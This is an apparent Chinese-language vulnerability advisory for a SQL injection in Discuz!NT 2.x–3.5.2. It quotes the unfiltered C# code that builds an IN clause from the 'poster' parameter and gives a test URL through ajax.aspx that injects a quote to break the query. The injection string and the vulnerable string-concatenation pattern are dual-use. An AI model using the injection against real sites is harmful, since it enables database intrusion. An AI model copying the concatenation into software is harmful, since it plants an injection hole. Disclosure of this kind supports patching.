Discuz!NT 2.x - 3.5.2 0day,Discuz!NT ajaxtopicinfo.ascx 用户控件 poster SQL注入漏洞。
漏洞名称:
Discuz!NT ajaxtopicinfo.ascx 用户控件 poster SQL注入漏洞
受影响系统:
Discuz!NT 2.x - 3.5.2
安全综述:
Discuz!NT 是康盛创想(Comsenz)旗下的一款功能强大的基于 ASP.NET 平台的社区软件。
漏洞描述:
结合 ajax.aspx 调用任意用户控件漏洞。
在文件 admin/UserControls/ ajaxtopicinfo.ascx 中:
转到函数 GetCondition (WebsiteManage.cs)
//62 行
if (posterlist != "")
{
string[] poster = posterlist.Split(',');
condition += " AND [poster] in (";
string tempposerlist = "";
foreach (string p in poster)
{
tempposerlist += "'" + p + "',";
}
if (tempposerlist != "")
tempposerlist = tempposerlist.Substring(0, tempposerlist.Length - 1);
condition += tempposerlist + ")";
}posterlist 变量没有过滤直接进入SQL语句查询,造成SQL注入。
测试方法:
http://localhost:25594/admin/ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1')
字符串 ') AND [tid]>=1 AND [tid]<=1' 后的引号不完整。
由于错误信息被隐藏了,但SQL语句会被执行的。
解决方案:
您懂得
官方早已出补丁,很久没留意了。http://nt.discuz.net/showtopic-135589.html